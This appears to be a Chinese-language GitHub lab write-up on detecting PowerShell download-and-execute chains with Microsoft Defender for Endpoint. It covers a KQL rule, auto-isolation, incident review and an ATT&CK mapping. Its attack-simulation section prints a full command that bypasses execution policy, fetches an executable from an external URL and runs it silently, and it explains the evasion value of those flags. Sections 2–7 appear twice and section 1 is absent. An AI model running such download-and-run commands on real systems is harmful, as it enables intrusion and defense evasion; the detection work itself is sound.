Ayaan0299/Automated-Incident-Response-Remote-Code-Execution-Detection
GitHub: Ayaan0299/Automated-Incident-Response-Remote-Code-Execution-Detection
基于 Microsoft Defender for Endpoint 构建的远程代码执行检测与自动化响应方案,通过自定义 KQL 规则识别 PowerShell 下载执行链并自动隔离设备。
Stars: 0 | Forks: 0
# [](https://git.io/typing-svg)
## 2. 检测规则
在 MDE 中设计了一条自定义检测规则,用于捕获 PowerShell 下载并执行链,这是一种在初始访问、横向移动和后渗透阶段都会使用的技术。
**检测内容:** 任何其启动命令行同时包含 `Invoke-WebRequest` 和 `Start-Process`(即先下载后执行的两阶段模式)的进程。
**检测 KQL:**
```
let VMName = "my-vm-name";
DeviceProcessEvents
| where DeviceName == VMName
| where InitiatingProcessCommandLine contains "Invoke-WebRequest"
| where InitiatingProcessCommandLine contains "Start-Process"
```
**已配置的自动化响应操作:**
- ✅ 隔离设备
- ✅ 收集调查包
## 3. 攻击模拟
执行了一条用于下载并静默安装二进制文件的 PowerShell 命令,高度还原了真实攻击者在初始入侵期间的行为。
```
cmd.exe /c powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "Invoke-WebRequest -Uri 'https://sacyberrange00.blob.core.windows.net/vm-applications/7z2408-x64.exe' -OutFile C:\ProgramData\7z2408-x64.exe; Start-Process 'C:\ProgramData\7z2408-x64.exe' -ArgumentList '/S' -Wait"
```
**重要性说明:** 攻击者使用 `ExecutionPolicy Bypass` 来规避默认的 PowerShell 限制,并使用 `NoProfile` 来抑制日志钩子。下载到 `C:\ProgramData` 可以避开受到更严密监控的用户配置文件路径。这种两阶段模式符合 T1059.001 和 T1105,通常在真实的初始入侵和后渗透活动中被观察到。
## 4. 自动化响应
一旦检测规则触发,Defender 会自动隔离端点,阻止 RDP 和所有外部网络流量,同时保留对 Defender 管理平面的访问。同时,它还会收集一份取证调查包,其中包含正在运行的进程、进程树、注册表更改、事件日志、网络连接和计划任务。
## 5. 事件调查
在 Microsoft Defender XDR 中查看了生成的事件。确认检测结果与模拟活动相符,追踪了进程树,检查了时间线,并解决了警报。设备在完成后解除了隔离。
## 6. MITRE ATT&CK 映射
| 战术 | 技术 | ID |
|---|---|---|
| 执行 | PowerShell | T1059.001 |
| 命令和脚本解释器 | PowerShell | T1059 |
| 入口工具传输 | 传输工具或 Payload | T1105 |
| 防御规避 | 执行策略绕过 | T1562 |
## 7. 展示技能
| 领域 | 详情 |
|---|---|
| **检测工程** | 针对 `DeviceProcessEvents` 中多阶段 PowerShell 行为的自定义 KQL 规则 |
| **KQL** | `contains`、`let` 变量、进程命令行的字段过滤 |
| **自动化事件响应** | 配置 MDE 响应操作以进行隔离和收集取证,无需人工干预 |
| **端点安全** | MDE 载入、遥测验证、Advanced Hunting、设备隔离工作流 |
| **取证分析** | 调查包审查,涵盖进程、注册表、事件日志和网络连接 |
| **MITRE ATT&CK** | 映射到 T1059.001、T1105、T1562 的检测 |
| **云安全** | Azure VM 配置、Windows Server 2025、Microsoft Defender XDR Portal |
## 2. 检测规则
在 MDE 中设计了一条自定义检测规则,用于捕获 PowerShell 下载并执行链,这是一种在初始访问、横向移动和后渗透阶段都会使用的技术。
**检测内容:** 任何其启动命令行同时包含 `Invoke-WebRequest` 和 `Start-Process`(即先下载后执行的两阶段模式)的进程。
**检测 KQL:**
```
let VMName = "my-vm-name";
DeviceProcessEvents
| where DeviceName == VMName
| where InitiatingProcessCommandLine contains "Invoke-WebRequest"
| where InitiatingProcessCommandLine contains "Start-Process"
```
**已配置的自动化响应操作:**
- ✅ 隔离设备
- ✅ 收集调查包
## 3. 攻击模拟
执行了一条用于下载并静默安装二进制文件的 PowerShell 命令,高度还原了真实攻击者在初始入侵期间的行为。
```
cmd.exe /c powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "Invoke-WebRequest -Uri 'https://sacyberrange00.blob.core.windows.net/vm-applications/7z2408-x64.exe' -OutFile C:\ProgramData\7z2408-x64.exe; Start-Process 'C:\ProgramData\7z2408-x64.exe' -ArgumentList '/S' -Wait"
```
**重要性说明:** 攻击者使用 `ExecutionPolicy Bypass` 来规避默认的 PowerShell 限制,并使用 `NoProfile` 来抑制日志钩子。下载到 `C:\ProgramData` 可以避开受到更严密监控的用户配置文件路径。这种两阶段模式符合 T1059.001 和 T1105,通常在真实的初始入侵和后渗透活动中被观察到。
## 4. 自动化响应
一旦检测规则触发,Defender 会自动隔离端点,阻止 RDP 和所有外部网络流量,同时保留对 Defender 管理平面的访问。同时,它还会收集一份取证调查包,其中包含正在运行的进程、进程树、注册表更改、事件日志、网络连接和计划任务。
## 5. 事件调查
在 Microsoft Defender XDR 中查看了生成的事件。确认检测结果与模拟活动相符,追踪了进程树,检查了时间线,并解决了警报。设备在完成后解除了隔离。
## 6. MITRE ATT&CK 映射
| 战术 | 技术 | ID |
|---|---|---|
| 执行 | PowerShell | T1059.001 |
| 命令和脚本解释器 | PowerShell | T1059 |
| 入口工具传输 | 传输工具或 Payload | T1105 |
| 防御规避 | 执行策略绕过 | T1562 |
## 7. 展示技能
| 领域 | 详情 |
|---|---|
| **检测工程** | 针对 `DeviceProcessEvents` 中多阶段 PowerShell 行为的自定义 KQL 规则 |
| **KQL** | `contains`、`let` 变量、进程命令行的字段过滤 |
| **自动化事件响应** | 配置 MDE 响应操作以进行隔离和收集取证,无需人工干预 |
| **端点安全** | MDE 载入、遥测验证、Advanced Hunting、设备隔离工作流 |
| **取证分析** | 调查包审查,涵盖进程、注册表、事件日志和网络连接 |
| **MITRE ATT&CK** | 映射到 T1059.001、T1105、T1562 的检测 |
| **云安全** | Azure VM 配置、Windows Server 2025、Microsoft Defender XDR Portal |标签:AI合规, AMSI绕过, EDR, KQL, OpenCanary, 威胁检测, 安全实验环境, 安全运营, 微软Defender, 扫描框架, 网络信息收集, 脆弱性评估, 自动化响应